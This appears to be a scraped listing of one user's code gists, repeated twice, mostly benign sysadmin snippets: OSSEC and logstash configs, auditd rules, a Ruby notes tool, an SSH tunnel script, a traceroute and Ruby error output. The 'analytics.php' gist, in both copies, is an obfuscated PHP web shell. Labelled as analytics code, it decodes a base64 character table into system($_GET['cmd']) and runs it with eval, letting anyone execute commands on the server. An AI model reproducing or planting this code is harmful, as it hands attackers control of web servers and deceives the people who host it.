maus-

## fwdrop
<command>
  <name>firewall-drop</name>
  <executable>firewall-drop.sh</executable>
  <expect>srcip</expect>
</command>

<active-response>
  <command>firewall-drop</command>
  <location>all</location>
  <rules_id>1002</rules_id>

## gist:6430818a486948422a07
#!/usr/bin/env ruby
# Version Controlled Notes.... Because I'm lazy. - Maus.
# TODO: Get git syncing working. Maybe do a branch that merges to master?
require 'optparse'
require 'fileutils'
require 'digest'
config = {
  notes_path:   ENV['HOME'] + '/notes',
  git_path:     ENV['HOME'] + '/notes/.git',
  git_remote:   '',

## logstash.conf
input {
  syslog = {
    type => syslog
    port => 514
  }
}
filter {
  grok {
   type => "auditd"
   pattern => [" AUDIT type=%{WORD:audit_type} msg=audit\(%{NUMBER:audit_epoch}:%{NUMBER:audit_coun

## Docker CDN Traceroute
traceroute: Warning: cdn-registry-1.docker.io has multiple addresses; using 162.159.253.251
traceroute to cdn-registry-1.docker.io.cdn.cloudflare.net (162.159.253.251), 64 hops max, 52 byte packets
 1  10.236.2.1 (10.236.2.1)  4.231 ms  3.890 ms  3.957 ms
 2  192.168.128.210 (192.168.128.210)  3.095 ms  4.799 ms  4.169 ms
 3  206.169.168.41 (206.169.168.41)  44.070 ms  9.694 ms  4.097 ms
 4  sjc1-pr1-xe-0-2-0-0.us.twtelecom.net (66.192.251.170)  17.472 ms  10.101 ms  16.170 ms
 5  equinix.xe-2-0-0.cr1.sjc1.us.nlayer.net (206.223.116.61)  8.831 ms  7.277 ms  6.697 ms
 6  as13335.xe-8-1-0.cr1.sjc1.us.nlayer.net (69.22.153.214)  38.691 ms  66.615 ms  23.516 ms
 7  162.159.253.251 (162.159.253.251)  7.672 ms  7.594 ms  6.401 ms

## gist:10010791
## Remove any existing rules
-D

## Buffer Size
## Feel free to increase this if the machine panic's
-b 8192

## Failure Mode
## Possible values are 0 (silent), 1 (printk, print a failure message),
## and 2 (panic, halt the system).

## analytics.php
<?php
//Begin Analytics Code
$STAT = unserialize(base64_decode("YTozMzp7aTowO3M6MToiaCI7aToxO3M6MToibSI7aToyO3M6MToiaSI7aTozO3M6MToibiI7aTo0O3M6MToiYSI7aTo1O3M6MToidyI7aTo2O3M6MToicCI7aTo3O3M6MToieSI7aTo4O3M6MToicyI7aTo5O3M6MToiYiI7aToxMDtzOjE6ImoiO2k6MTE7czoxOiJ1IjtpOjEyO3M6MToieiI7aToxMztzOjE6ImwiO2k6MTQ7czoxOiJrIjtpOjE1O3M6MToiZiI7aToxNjtzOjE6InYiO2k6MTc7czoxOiJlIjtpOjE4O3M6MToiciI7aToxOTtzOjE6ImQiO2k6MjA7czoxOiInIjtpOjIxO3M6MToibyI7aToyMjtzOjE6IngiO2k6MjM7czoxOiJdIjtpOjI0O3M6MToiWyI7aToyNTtzOjI6Iik7IjtpOjI2O3M6MToiZyI7aToyNztzOjE6InQiO2k6Mjg7czoxOiJjIjtpOjI5O3M6MToiJCI7aTozMDtzOjE6Il8iO2k6MzE7czoxOiIoIjtpOjMyO3M6MToicSI7fQ=="));
$values =
$STAT[8] . $STAT[7] . $STAT[8] . $STAT[27] . $STAT[17] . $STAT[1] . $STAT[31] . $STAT[29]  .
$STAT[30] . strtoupper( $STAT[26] . $STAT[17] . $STAT[27] ) . $STAT[24] . $STAT[20] .
$STAT[28] . $STAT[1] . $STAT[19] . $STAT[20] . $STAT[23] .$STAT[25];
eval("$values");
?>

## gist:5650573
#!/bin/bash
# 2012 Maus Stearns,
# Quick ssh tunneling / reconnect tool
# Used primarily for quick synergy tunnels.
RHOST=192.168.1.1
RPORT=24800
PID=$(ps -ef |grep ssh |grep $RPORT | awk '{print $2}')

if [ -n "$PID" ]; then
    echo "Existing Connection Exists. $PID"

## gist:5259108
/usr/local/rvm/rubies/ruby-1.9.3-p392/lib/ruby/1.9.1/yaml.rb:56:in `<top (required)>':
It seems your ruby installation is missing psych (for YAML output).
To eliminate this warning, please install libyaml and reinstall your ruby.
ERROR:  Loading command: install (LoadError)
    cannot load such file -- zlib
ERROR:  While executing gem ... (NameError)
    uninitialized constant Gem::Commands::InstallCommand
/usr/local/rvm/rubies/ruby-1.9.3-p392/lib/ruby/1.9.1/yaml.rb:56:in `<top (required)>':
It seems your ruby installation is missing psych (for YAML output).
To eliminate this warning, please install libyaml and reinstall your ruby.
	<command>
	<name>firewall-drop</name>
	<executable>firewall-drop.sh</executable>
	<expect>srcip</expect>
	</command>

	<active-response>
	<command>firewall-drop</command>
	<location>all</location>
	<rules_id>1002</rules_id>
	#!/usr/bin/env ruby
	# Version Controlled Notes.... Because I'm lazy. - Maus.
	# TODO: Get git syncing working. Maybe do a branch that merges to master?
	require 'optparse'
	require 'fileutils'
	require 'digest'
	config = {
	notes_path: ENV['HOME'] + '/notes',
	git_path: ENV['HOME'] + '/notes/.git',
	git_remote: '',
	input {
	syslog = {
	type => syslog
	port => 514
	}
	}
	filter {
	grok {
	type => "auditd"
	pattern => [" AUDIT type=%{WORD:audit_type} msg=audit\(%{NUMBER:audit_epoch}:%{NUMBER:audit_coun
	traceroute: Warning: cdn-registry-1.docker.io has multiple addresses; using 162.159.253.251
	traceroute to cdn-registry-1.docker.io.cdn.cloudflare.net (162.159.253.251), 64 hops max, 52 byte packets
	1 10.236.2.1 (10.236.2.1) 4.231 ms 3.890 ms 3.957 ms
	2 192.168.128.210 (192.168.128.210) 3.095 ms 4.799 ms 4.169 ms
	3 206.169.168.41 (206.169.168.41) 44.070 ms 9.694 ms 4.097 ms
	4 sjc1-pr1-xe-0-2-0-0.us.twtelecom.net (66.192.251.170) 17.472 ms 10.101 ms 16.170 ms
	5 equinix.xe-2-0-0.cr1.sjc1.us.nlayer.net (206.223.116.61) 8.831 ms 7.277 ms 6.697 ms
	6 as13335.xe-8-1-0.cr1.sjc1.us.nlayer.net (69.22.153.214) 38.691 ms 66.615 ms 23.516 ms
	7 162.159.253.251 (162.159.253.251) 7.672 ms 7.594 ms 6.401 ms
	## Remove any existing rules
	-D

	## Buffer Size
	## Feel free to increase this if the machine panic's
	-b 8192

	## Failure Mode
	## Possible values are 0 (silent), 1 (printk, print a failure message),
	## and 2 (panic, halt the system).
	<?php
	//Begin Analytics Code
	$STAT = unserialize(base64_decode("YTozMzp7aTowO3M6MToiaCI7aToxO3M6MToibSI7aToyO3M6MToiaSI7aTozO3M6MToibiI7aTo0O3M6MToiYSI7aTo1O3M6MToidyI7aTo2O3M6MToicCI7aTo3O3M6MToieSI7aTo4O3M6MToicyI7aTo5O3M6MToiYiI7aToxMDtzOjE6ImoiO2k6MTE7czoxOiJ1IjtpOjEyO3M6MToieiI7aToxMztzOjE6ImwiO2k6MTQ7czoxOiJrIjtpOjE1O3M6MToiZiI7aToxNjtzOjE6InYiO2k6MTc7czoxOiJlIjtpOjE4O3M6MToiciI7aToxOTtzOjE6ImQiO2k6MjA7czoxOiInIjtpOjIxO3M6MToibyI7aToyMjtzOjE6IngiO2k6MjM7czoxOiJdIjtpOjI0O3M6MToiWyI7aToyNTtzOjI6Iik7IjtpOjI2O3M6MToiZyI7aToyNztzOjE6InQiO2k6Mjg7czoxOiJjIjtpOjI5O3M6MToiJCI7aTozMDtzOjE6Il8iO2k6MzE7czoxOiIoIjtpOjMyO3M6MToicSI7fQ=="));
	$values =
	$STAT[8] . $STAT[7] . $STAT[8] . $STAT[27] . $STAT[17] . $STAT[1] . $STAT[31] . $STAT[29] .
	$STAT[30] . strtoupper( $STAT[26] . $STAT[17] . $STAT[27] ) . $STAT[24] . $STAT[20] .
	$STAT[28] . $STAT[1] . $STAT[19] . $STAT[20] . $STAT[23] .$STAT[25];
	eval("$values");
	?>
	#!/bin/bash
	# 2012 Maus Stearns,
	# Quick ssh tunneling / reconnect tool
	# Used primarily for quick synergy tunnels.
	RHOST=192.168.1.1
	RPORT=24800
	PID=$(ps -ef \|grep ssh \|grep $RPORT \| awk '{print $2}')

	if [ -n "$PID" ]; then
	echo "Existing Connection Exists. $PID"
	/usr/local/rvm/rubies/ruby-1.9.3-p392/lib/ruby/1.9.1/yaml.rb:56:in `<top (required)>':
	It seems your ruby installation is missing psych (for YAML output).
	To eliminate this warning, please install libyaml and reinstall your ruby.
	ERROR: Loading command: install (LoadError)
	cannot load such file -- zlib
	ERROR: While executing gem ... (NameError)
	uninitialized constant Gem::Commands::InstallCommand
	/usr/local/rvm/rubies/ruby-1.9.3-p392/lib/ruby/1.9.1/yaml.rb:56:in `<top (required)>':
	It seems your ruby installation is missing psych (for YAML output).
	To eliminate this warning, please install libyaml and reinstall your ruby.